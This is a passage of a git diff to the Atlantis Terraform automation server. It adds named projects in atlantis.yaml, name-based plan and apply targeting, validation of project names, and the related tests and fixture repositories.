+ if ctx.Command.ProjectName != "" { + projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if projCfg == nil { + return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + } + } else { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + } globalCfg = &config } + if ctx.Command.ProjectName != "" && !hasAtlantisYAML { + return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + } + projCtx := models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -153,6 +174,7 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command CommentArgs: ctx.Command.Flags, Workspace: ctx.Command.Workspace, RepoRelPath: ctx.Command.Dir, + ProjectName: ctx.Command.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } @@ -182,11 +204,25 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman if err != nil && !os.IsNotExist(err) { return CommandResponse{Error: err} } - if !os.IsNotExist(err) { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + hasAtlantisYAML := !os.IsNotExist(err) + if hasAtlantisYAML { + // If they've specified a project by name we look it up. Otherwise we + // use the dir and workspace. 
+ if ctx.Command.ProjectName != "" { + projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if projCfg == nil { + return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + } + } else { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + } globalCfg = &config } + if ctx.Command.ProjectName != "" && !hasAtlantisYAML { + return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + } + projCtx := models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -196,6 +232,7 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman CommentArgs: ctx.Command.Flags, Workspace: ctx.Command.Workspace, RepoRelPath: ctx.Command.Dir, + ProjectName: ctx.Command.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_operator.go index 819bcbf200..7b4a58c80a 100644 --- a/server/events/runtime/apply_step_operator.go +++ b/server/events/runtime/apply_step_operator.go @@ -15,13 +15,18 @@ type ApplyStepOperator struct { } func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { - planPath := filepath.Join(path, ctx.Workspace+".tfplan") - stat, err := os.Stat(planPath) + // todo: move this to a common library + planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace) + if ctx.ProjectName != "" { + planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName) + } + planFile := filepath.Join(path, planFileName) + stat, err := os.Stat(planFile) if err != nil || stat.IsDir() { return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelPath, ctx.Workspace) } - tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planPath) + tfApplyCmd 
:= append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planFile) var tfVersion *version.Version if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { tfVersion = ctx.ProjectConfig.TerraformVersion diff --git a/server/events/runtime/plan_step_operater.go b/server/events/runtime/plan_step_operater.go index a7fd6793d0..30028dd487 100644 --- a/server/events/runtime/plan_step_operater.go +++ b/server/events/runtime/plan_step_operater.go @@ -32,7 +32,12 @@ func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []str return "", err } - planFile := filepath.Join(path, fmt.Sprintf("%s.tfplan", ctx.Workspace)) + // todo: move this to a common library + planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace) + if ctx.ProjectName != "" { + planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName) + } + planFile := filepath.Join(path, planFileName) userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username) tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...) diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go index 8dc895d132..a56ca586c6 100644 --- a/server/events/yaml/parser_validator.go +++ b/server/events/yaml/parser_validator.go @@ -21,7 +21,7 @@ type ParserValidator struct{} // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. // If there was no config file, then this can be detected by checking the type // of error: os.IsNotExist(error). 
-func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { +func (p *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) @@ -37,14 +37,14 @@ func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { } // If the config file exists, parse it. - config, err := r.parseAndValidate(configData) + config, err := p.parseAndValidate(configData) if err != nil { return valid.Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } return config, err } -func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) { +func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) { var rawSpec raw.Spec if err := yaml.UnmarshalStrict(configData, &rawSpec); err != nil { return valid.Spec{}, err @@ -58,20 +58,73 @@ func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error } // Top level validation. - for _, p := range rawSpec.Projects { - if p.Workflow != nil { - workflow := *p.Workflow - found := false - for k := range rawSpec.Workflows { - if k == workflow { - found = true - } - } - if !found { - return valid.Spec{}, fmt.Errorf("workflow %q is not defined", workflow) + if err := p.validateWorkflows(rawSpec); err != nil { + return valid.Spec{}, err + } + + validSpec := rawSpec.ToValid() + if err := p.validateProjectNames(validSpec); err != nil { + return valid.Spec{}, err + } + + return validSpec, nil +} + +func (p *ParserValidator) validateProjectNames(spec valid.Spec) error { + // First, validate that all names are unique. 
+ seen := make(map[string]bool) + for _, project := range spec.Projects { + if project.Name != nil { + name := *project.Name + exists := seen[name] + if exists { + return fmt.Errorf("found two or more projects with name %q; project names must be unique", name) } + seen[name] = true } } - return rawSpec.ToValid(), nil + // Next, validate that all dir/workspace combos are named. + // This map's keys will be 'dir/workspace' and the values are the names for + // that project. + dirWorkspaceToNames := make(map[string][]string) + for _, project := range spec.Projects { + key := fmt.Sprintf("%s/%s", project.Dir, project.Workspace) + names := dirWorkspaceToNames[key] + + // If there is already a project with this dir/workspace then this + // project must have a name. + if len(names) > 0 && project.Name == nil { + return fmt.Errorf("there are two or more projects with dir: %q workspace: %q that are not all named; they must have a 'name' key so they can be targeted for apply's separately", project.Dir, project.Workspace) + } + var name string + if project.Name != nil { + name = *project.Name + } + dirWorkspaceToNames[key] = append(dirWorkspaceToNames[key], name) + } + + return nil +} + +func (p *ParserValidator) validateWorkflows(spec raw.Spec) error { + for _, project := range spec.Projects { + if err := p.validateWorkflowExists(project, spec.Workflows); err != nil { + return err + } + } + return nil +} + +func (p *ParserValidator) validateWorkflowExists(project raw.Project, workflows map[string]raw.Workflow) error { + if project.Workflow == nil { + return nil + } + workflow := *project.Workflow + for k := range workflows { + if k == workflow { + return nil + } + } + return fmt.Errorf("workflow %q is not defined", workflow) } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 15bcd19602..abafcba940 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -262,6 
+262,78 @@ projects: workflow: undefined`, expErr: "workflow \"undefined\" is not defined", }, + { + description: "two projects with same dir/workspace without names", + input: ` +version: 2 +projects: +- dir: . + workspace: workspace +- dir: . + workspace: workspace`, + expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately", + }, + { + description: "two projects with same dir/workspace only one with name", + input: ` +version: 2 +projects: +- name: myname + dir: . + workspace: workspace +- dir: . + workspace: workspace`, + expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's separately", + }, + { + description: "two projects with same dir/workspace both with same name", + input: ` +version: 2 +projects: +- name: myname + dir: . + workspace: workspace +- name: myname + dir: . + workspace: workspace`, + expErr: "found two or more projects with name \"myname\"; project names must be unique", + }, + { + description: "two projects with same dir/workspace with different names", + input: ` +version: 2 +projects: +- name: myname + dir: . + workspace: workspace +- name: myname2 + dir: . 
+ workspace: workspace`, + exp: valid.Spec{ + Version: 2, + Projects: []valid.Project{ + { + Name: String("myname"), + Dir: ".", + Workspace: "workspace", + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + { + Name: String("myname2"), + Dir: ".", + Workspace: "workspace", + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, + Workflows: map[string]valid.Workflow{}, + }, + }, } tmpDir, cleanup := TempDir(t) diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go index 29335e7954..3de10b5320 100644 --- a/server/events/yaml/raw/project.go +++ b/server/events/yaml/raw/project.go @@ -16,6 +16,7 @@ const ( ) type Project struct { + Name *string `yaml:"name,omitempty"` Dir *string `yaml:"dir,omitempty"` Workspace *string `yaml:"workspace,omitempty"` Workflow *string `yaml:"workflow,omitempty"` @@ -78,5 +79,7 @@ func (p Project) ToValid() valid.Project { // There are no default apply requirements. 
v.ApplyRequirements = p.ApplyRequirements + v.Name = p.Name + return v } diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go index b10452afeb..79f0cf7dbf 100644 --- a/server/events/yaml/raw/project_test.go +++ b/server/events/yaml/raw/project_test.go @@ -27,11 +27,13 @@ func TestProject_UnmarshalYAML(t *testing.T) { TerraformVersion: nil, Autoplan: nil, ApplyRequirements: nil, + Name: nil, }, }, { description: "all fields set", input: ` +name: myname dir: mydir workspace: workspace workflow: workflow @@ -42,6 +44,7 @@ autoplan: apply_requirements: - mergeable`, exp: raw.Project{ + Name: String("myname"), Dir: String("mydir"), Workspace: String("workspace"), Workflow: String("workflow"), @@ -168,6 +171,7 @@ func TestProject_ToValid(t *testing.T) { Enabled: true, }, ApplyRequirements: nil, + Name: nil, }, }, { @@ -182,6 +186,7 @@ func TestProject_ToValid(t *testing.T) { Enabled: Bool(false), }, ApplyRequirements: []string{"approved"}, + Name: String("myname"), }, exp: valid.Project{ Dir: ".", @@ -193,6 +198,7 @@ func TestProject_ToValid(t *testing.T) { Enabled: false, }, ApplyRequirements: []string{"approved"}, + Name: String("myname"), }, }, { diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go index b414f4607f..af17335c1b 100644 --- a/server/events/yaml/raw/step.go +++ b/server/events/yaml/raw/step.go @@ -3,6 +3,7 @@ package raw import ( "errors" "fmt" + "sort" "strings" "github.com/flynn-archive/go-shlex" @@ -93,6 +94,8 @@ func (s Step) Validate() error { for k := range elem { keys = append(keys, k) } + // Sort so tests can be deterministic. 
+ sort.Strings(keys) if len(keys) > 1 { return fmt.Errorf("step element can only contain a single key, found %d: %s", diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go index 0a7ef2e972..fd182902aa 100644 --- a/server/events/yaml/valid/valid.go +++ b/server/events/yaml/valid/valid.go @@ -40,9 +40,19 @@ func (s Spec) FindProject(dir string, workspace string) *Project { return nil } +func (s Spec) FindProjectByName(name string) *Project { + for _, p := range s.Projects { + if p.Name != nil && *p.Name == name { + return &p + } + } + return nil +} + type Project struct { Dir string Workspace string + Name *string Workflow *string TerraformVersion *version.Version Autoplan Autoplan diff --git a/server/events_controller.go b/server/events_controller.go index d9e344fe55..e41fe75c23 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -182,7 +182,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // We use a Command to represent autoplanning but we set dir and // workspace to '*' to indicate that all applicable dirs and workspaces // should be planned. - autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) + autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", "", true) e.Logger.Info("executing command %s", autoplanCmd) if !e.TestingMode { go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) @@ -250,7 +250,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo e.respond(w, logging.Debug, http.StatusOK, "Ignoring non-command comment: %q", truncated) return } - e.Logger.Info("parsed comment as %s", parseResult) + e.Logger.Info("parsed comment as %s", parseResult.Command) // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. 
diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 2cd7183c07..3853d1349b 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -31,23 +31,10 @@ import ( . "github.com/runatlantis/atlantis/testing" ) -/* -flows: -- pull request opened autoplan -- comment to apply - -github/gitlab - -locking - -merging pull requests - -different repo organizations - -atlantis.yaml - -*/ func TestGitHubWorkflow(t *testing.T) { + if testing.Short() { + t.SkipNow() + } RegisterMockTestingT(t) cases := []struct { @@ -136,7 +123,31 @@ func TestGitHubWorkflow(t *testing.T) { "atlantis apply -d staging", "exp-output-apply-staging.txt", "atlantis apply -d production", "exp-output-apply-production.txt", }, - ExpMergeCommentFile: "exp-output-merge-all-dirs.txt", + ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "tfvars-yaml", + RepoDir: "tfvars-yaml", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "exp-output-autoplan.txt", + CommentAndReplies: []string{ + "atlantis apply -p staging", "exp-output-apply-staging.txt", + "atlantis apply -p default", "exp-output-apply-default.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", + }, + { + Description: "tfvars no autoplan", + RepoDir: "tfvars-yaml-no-autoplan", + ModifiedFiles: []string{"main.tf"}, + ExpAutoplanCommentFile: "", + CommentAndReplies: []string{ + "atlantis plan -p staging", "exp-output-plan-staging.txt", + "atlantis plan -p default", "exp-output-plan-default.txt", + "atlantis apply -p staging", "exp-output-apply-staging.txt", + "atlantis apply -p default", "exp-output-apply-default.txt", + }, + ExpMergeCommentFile: "exp-output-merge.txt", }, } for _, c := range cases { @@ -156,8 +167,10 @@ func TestGitHubWorkflow(t *testing.T) { pullOpenedReq := GitHubPullRequestOpenedEvent(t) ctrl.Post(w, pullOpenedReq) responseContains(t, w, 200, "Processing...") - _, _, autoplanComment := 
vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() - assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir) + if c.ExpAutoplanCommentFile != "" { + _, _, autoplanComment := vcsClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + assertCommentEquals(t, c.ExpAutoplanCommentFile, autoplanComment, c.RepoDir) + } // Now send any other comments. for i := 0; i < len(c.CommentAndReplies); i += 2 { @@ -414,9 +427,10 @@ func assertCommentEquals(t *testing.T, expFile string, act string, repoDir strin exp, err := ioutil.ReadFile(filepath.Join(absRepoPath(t, repoDir), expFile)) Ok(t, err) - // Replace all 'ID: 1111818181' strings with * so we can do a comparison. - idRegex := regexp.MustCompile(`\(ID: [0-9]+\)`) - act = idRegex.ReplaceAllString(act, "(ID: ******************)") + // Replace all 'Creation complete after 1s ID: 1111818181' strings with + // 'Creation complete after *s ID: **********' so we can do a comparison. + idRegex := regexp.MustCompile(`Creation complete after [0-9]+s \(ID: [0-9]+\)`) + act = idRegex.ReplaceAllString(act, "Creation complete after *s (ID: ******************)") if string(exp) != act { actFile := filepath.Join(absRepoPath(t, repoDir), expFile+".act") diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt index 81c3ec8bfa..f0608bcf22 100644 --- a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-production.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `production` workspace: `default` ```diff module.null.null_resource.this: Creating... -module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! 
Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt index 2ec35e2786..ffc7878fe5 100644 --- a/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-apply-staging.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `staging` workspace: `default` ```diff module.null.null_resource.this: Creating... -module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt index b64103b412..9712df1ee2 100644 --- a/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt +++ b/server/testfixtures/test-repos/modules-yaml/exp-output-merge.txt @@ -1,4 +1,4 @@ Locks and plans deleted for the projects and workspaces modified in this pull request: -- path: `runatlantis/atlantis-tests/staging` workspace: `default` -- path: `runatlantis/atlantis-tests/.` workspace: `default` +- path: `runatlantis/atlantis-tests/production` workspace: `default` +- path: `runatlantis/atlantis-tests/staging` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt index 81c3ec8bfa..f0608bcf22 100644 --- a/server/testfixtures/test-repos/modules/exp-output-apply-production.txt +++ b/server/testfixtures/test-repos/modules/exp-output-apply-production.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `production` workspace: `default` ```diff module.null.null_resource.this: Creating... 
-module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt index 2ec35e2786..ffc7878fe5 100644 --- a/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt +++ b/server/testfixtures/test-repos/modules/exp-output-apply-staging.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `staging` workspace: `default` ```diff module.null.null_resource.this: Creating... -module.null.null_resource.this: Creation complete after 0s (ID: ******************) +module.null.null_resource.this: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt index 4c1f22f7a9..93654c7deb 100644 --- a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-default.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. 
diff --git a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt index d467c8c713..6aed57ab53 100644 --- a/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt +++ b/server/testfixtures/test-repos/simple-yaml/exp-output-apply-staging.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `staging` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt index ef14ca06f5..59398bd4e5 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-default-workspace.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt index e17039ffce..e167833832 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var-new-workspace.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `new_workspace` ```diff null_resource.simple: Creating... 
-null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt index 8c49494b4a..bd2cd1207b 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply-var.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply-var.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/simple/exp-output-apply.txt b/server/testfixtures/test-repos/simple/exp-output-apply.txt index 6c123ea8f5..ea31933908 100644 --- a/server/testfixtures/test-repos/simple/exp-output-apply.txt +++ b/server/testfixtures/test-repos/simple/exp-output-apply.txt @@ -1,7 +1,7 @@ Ran Apply in dir: `.` workspace: `default` ```diff null_resource.simple: Creating... -null_resource.simple: Creation complete after 0s (ID: ******************) +null_resource.simple: Creation complete after *s (ID: ******************) Apply complete! Resources: 1 added, 0 changed, 0 destroyed. diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml new file mode 100644 index 0000000000..8dbfe353ec --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml @@ -0,0 +1,29 @@ +version: 2 +projects: +- dir: . + name: default + workflow: default + autoplan: + enabled: false +- dir: . 
+ workflow: staging + name: staging + autoplan: + enabled: false +workflows: + default: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=default.backend.tfvars] + - plan: + extra_args: [-var-file=default.tfvars] + staging: + plan: + steps: + - run: rm -rf .terraform + - init: + extra_args: [-backend-config=staging.backend.tfvars] + - plan: + extra_args: [-var-file, staging.tfvars] diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars new file mode 100644 index 0000000000..a03acf6e2d --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars @@ -0,0 +1 @@ +path = "default.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars new file mode 100644 index 0000000000..c5e157a5d5 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars @@ -0,0 +1 @@ +var = "default" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt new file mode 100644 index 0000000000..9ccb1a95d6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. 
+ +State path: default.tfstate + +Outputs: + +var = default +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt new file mode 100644 index 0000000000..e0d34d0905 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt @@ -0,0 +1,21 @@ +Ran Apply in dir: `.` workspace: `default` +```diff +null_resource.simple: Creating... +null_resource.simple: Creation complete after *s (ID: ******************) + +Apply complete! Resources: 1 added, 0 changed, 0 destroyed. + +The state of your infrastructure has been saved to the path +below. This state is required to modify and destroy your +infrastructure, so keep it safe. To inspect the complete state +use the `terraform show` command. + +State path: staging.tfstate + +Outputs: + +var = staging +workspace = default + +``` + diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt new file mode 100644 index 0000000000..c09b916bd6 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt @@ -0,0 +1,3 @@ +Locks and plans deleted for the projects and workspaces modified in this pull request: + +- path: `runatlantis/atlantis-tests/.` workspace: `default` \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... 
+The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt new file mode 100644 index 0000000000..15a712c428 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `.` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ null_resource.simple + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). 
+ diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf new file mode 100644 index 0000000000..d4d77ff4e7 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf @@ -0,0 +1,19 @@ +terraform { + backend "local" { + } +} + +resource "null_resource" "simple" { + count = 1 +} + +variable "var" { +} + +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars new file mode 100644 index 0000000000..e8133a2b59 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars @@ -0,0 +1 @@ +path = "staging.tfstate" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars new file mode 100644 index 0000000000..34f4bbb990 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars @@ -0,0 +1 @@ +var = "staging" \ No newline at end of file diff --git a/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml new file mode 100644 index 0000000000..217e8fd995 --- /dev/null +++ b/server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml @@ -0,0 +1,25 @@ +version: 2 +projects: +- dir: . + name: default + workflow: default +- dir: . 
